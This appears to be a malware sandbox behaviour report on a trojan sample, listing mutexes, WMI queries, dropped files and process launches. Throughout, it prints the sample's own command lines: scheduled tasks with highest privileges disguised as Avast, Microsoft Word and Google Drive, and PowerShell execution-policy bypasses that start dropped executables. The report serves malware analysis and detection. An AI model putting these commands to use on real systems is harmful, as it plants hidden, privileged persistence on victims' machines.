Source: 19.2.pto2q1ow.nf5.exe.12f8ceb0.0.raw.unpack, KPKTbmek.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: 19.2.pto2q1ow.nf5.exe.12f8ceb0.0.raw.unpack, yRWQWPsqZ.csSecurity API names: File.GetAccessControl
Source: 19.2.pto2q1ow.nf5.exe.12f8ceb0.0.raw.unpack, yRWQWPsqZ.csSecurity API names: File.SetAccessControl
Source: 19.2.pto2q1ow.nf5.exe.12f8ceb0.0.raw.unpack, yRWQWPsqZ.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: xdwdPutty.exe.33.dr, rVDiXyUmB.csSecurity API names: Directory.GetAccessControl
Source: xdwdPutty.exe.33.dr, rVDiXyUmB.csSecurity API names: Directory.SetAccessControl
Source: xdwdPutty.exe.33.dr, yRWQWPsqZ.csSecurity API names: File.GetAccessControl
Source: xdwdPutty.exe.33.dr, yRWQWPsqZ.csSecurity API names: File.SetAccessControl
Source: xdwdPutty.exe.33.dr, yRWQWPsqZ.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: xdwdMicrosoft PowerPoint Host.exe.19.dr, WJEyDHemWfF.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: classification engineClassification label: mal100.troj.evad.winEXE@196/11@4/3
Source: C:\Users\user\Desktop\ptKNiAaGus.exeFile created: C:\Users\user\xdwdPutty.exeJump to behavior
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2624:304:WilStaging_02
Source: C:\Users\user\Desktop\ptKNiAaGus.exeMutant created: \Sessions\1\BaseNamedObjects\Sheet_kctlwwmgcldm
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8556:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8324:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9676:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8820:304:WilStaging_02
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5320:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:712:304:WilStaging_02
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8620:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9676:304:WilStaging_02
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8556:304:WilStaging_02
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7712:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5872:304:WilStaging_02
Source: C:\Users\user\xdwdPutty.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9580:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9184:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2060:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4908:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7300:304:WilStaging_02
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7080:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:712:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2624:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7948:304:WilStaging_02
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeMutant created: \Sessions\1\BaseNamedObjects\Sheet_gwjvyiugty
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2060:304:WilStaging_02
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4908:304:WilStaging_02
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5872:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9580:304:WilStaging_02
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7948:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5320:304:WilStaging_02
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9132:304:WilStaging_02
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8620:304:WilStaging_02
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:10232:304:WilStaging_02
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9684:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:608:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4528:304:WilStaging_02
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7080:304:WilStaging_02
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:10232:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9684:304:WilStaging_02
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8324:304:WilStaging_02
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7752:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9132:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8820:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7300:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4528:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9184:304:WilStaging_02
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7712:304:WilStaging_02
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:608:304:WilStaging_02
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7752:304:WilStaging_02
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kvdx4sk4.juy.ps1Jump to behavior
Source: ptKNiAaGus.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: ptKNiAaGus.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
Source: C:\Users\user\Desktop\ptKNiAaGus.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\xdwdPutty.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\xdwdPutty.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\xdwdPutty.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\ptKNiAaGus.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: ptKNiAaGus.exeReversingLabs: Detection: 83%
Source: C:\Users\user\Desktop\ptKNiAaGus.exeFile read: C:\Users\user\Desktop\ptKNiAaGus.exeJump to behavior
Source: unknownProcess created: C:\Users\user\Desktop\ptKNiAaGus.exe "C:\Users\user\Desktop\ptKNiAaGus.exe"
Source: C:\Users\user\Desktop\ptKNiAaGus.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\Desktop\ptKNiAaGus.exeProcess created: C:\Windows\System32\cmd.exe "CMD" /C SchTaSKs /CrEAte /F /sc OnLoGoN /rl HighEst /tn "Avast Antivirus" /tr "C:\Users\user\xdwdPutty.exe" & exit
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SchTaSKs /CrEAte /F /sc OnLoGoN /rl HighEst /tn "Avast Antivirus" /tr "C:\Users\user\xdwdPutty.exe"
Source: C:\Users\user\Desktop\ptKNiAaGus.exeProcess created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST & exit
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST
Source: C:\Users\user\Desktop\ptKNiAaGus.exeProcess created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo 5 /tn "Google Drive" /tr "C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe" /RL HIGHEST & exit
Source: C:\Users\user\Desktop\ptKNiAaGus.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c start /b powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe"' & exit
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SchTaSKs /create /f /sc minute /mo 5 /tn "Google Drive" /tr "C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe" /RL HIGHEST
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe"'
Source: unknownProcess created: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe "C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe"
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeProcess created: C:\Windows\System32\cmd.exe "CMD" /C SchTaSKs /CrEAte /F /sc OnLoGoN /rl HighEst /tn "OpenOffice" /tr "C:\Users\user\Videos\xdwdMicrosoft PowerPoint Host.exe" & exit
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SchTaSKs /CrEAte /F /sc OnLoGoN /rl HighEst /tn "OpenOffice" /tr "C:\Users\user\Videos\xdwdMicrosoft PowerPoint Host.exe"
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeProcess created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST & exit
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST
Source: C:\Users\user\Desktop\ptKNiAaGus.exeProcess created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST & exit
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST
Source: C:\Users\user\Desktop\ptKNiAaGus.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c start /b powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe"' & exit
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe"'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe"
Source: C:\Users\user\Desktop\ptKNiAaGus.exeProcess created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST & exit
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeProcess created: C:\Users\user\xdwdPutty.exe "C:\Users\user\xdwdPutty.exe"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exeProcess created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Azure DevOps" /tr "C:\Users\user\Videos\xdwdMicrosoft PowerPoint Host.exe" /RL HIGHEST & exit
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Azure DevOps" /tr "C:\Users\user\Videos\xdwdMicrosoft PowerPoint Host.exe" /RL HIGHEST
Source: C:\Users\user\xdwdPutty.exeProcess created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST & exit
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST
Source: C:\Users\user\Desktop\ptKNiAaGus.exeProcess created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST & exit
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST
Source: C:\Users\user\Desktop\ptKNiAaGus.exeProcess created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST & exit
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST
Source: unknownProcess created: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe "C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe"
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeProcess created: C:\Windows\System32\cmd.exe "CMD" /c scHTaSks /Run /I /TN "Avast Antivirus"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe scHTaSks /Run /I /TN "Avast Antivirus"
Source: C:\Users\user\Desktop\ptKNiAaGus.exeProcess created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST & exit
Source: unknownProcess created: C:\Users\user\xdwdPutty.exe C:\Users\user\xdwdPutty.exe
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST
Source: C:\Users\user\xdwdPutty.exeProcess created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST & exit
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST
Source: C:\Users\user\Desktop\ptKNiAaGus.exeProcess created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST & exit
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe "C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe"
Source: C:\Users\user\Desktop\ptKNiAaGus.exeProcess created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST & exit
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeProcess created: C:\Windows\System32\cmd.exe "CMD" /c scHTaSks /Run /I /TN "Avast Antivirus"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe scHTaSks /Run /I /TN "Avast Antivirus"
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeProcess created: C:\Users\user\xdwdPutty.exe C:\Users\user\xdwdPutty.exe
Source: C:\Users\user\Desktop\ptKNiAaGus.exeProcess created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST & exit
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeProcess created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Azure DevOps" /tr "C:\Users\user\Videos\xdwdMicrosoft PowerPoint Host.exe" /RL HIGHEST & exit
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeProcess created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo 5 /tn "Corel PaintShop Pro" /tr "C:\Users\user\Videos\xdwdPutty.exe" /RL HIGHEST & exit
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\xdwdPutty.exeProcess created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST & exit
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\Conhost.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\Conhost.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\ptKNiAaGus.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\ptKNiAaGus.exeProcess created: C:\Windows\System32\cmd.exe "CMD" /C SchTaSKs /CrEAte /F /sc OnLoGoN /rl HighEst /tn "Avast Antivirus" /tr "C:\Users\user\xdwdPutty.exe" & exitJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeProcess created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST & exitJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeProcess created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo 5 /tn "Google Drive" /tr "C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe" /RL HIGHEST & exitJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c start /b powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe"' & exitJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeProcess created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST & exitJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c start /b powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe"' & exitJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeProcess created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST & exitJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeProcess created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST & exitJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeProcess created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST & exitJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeProcess created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST & exitJump to behavior
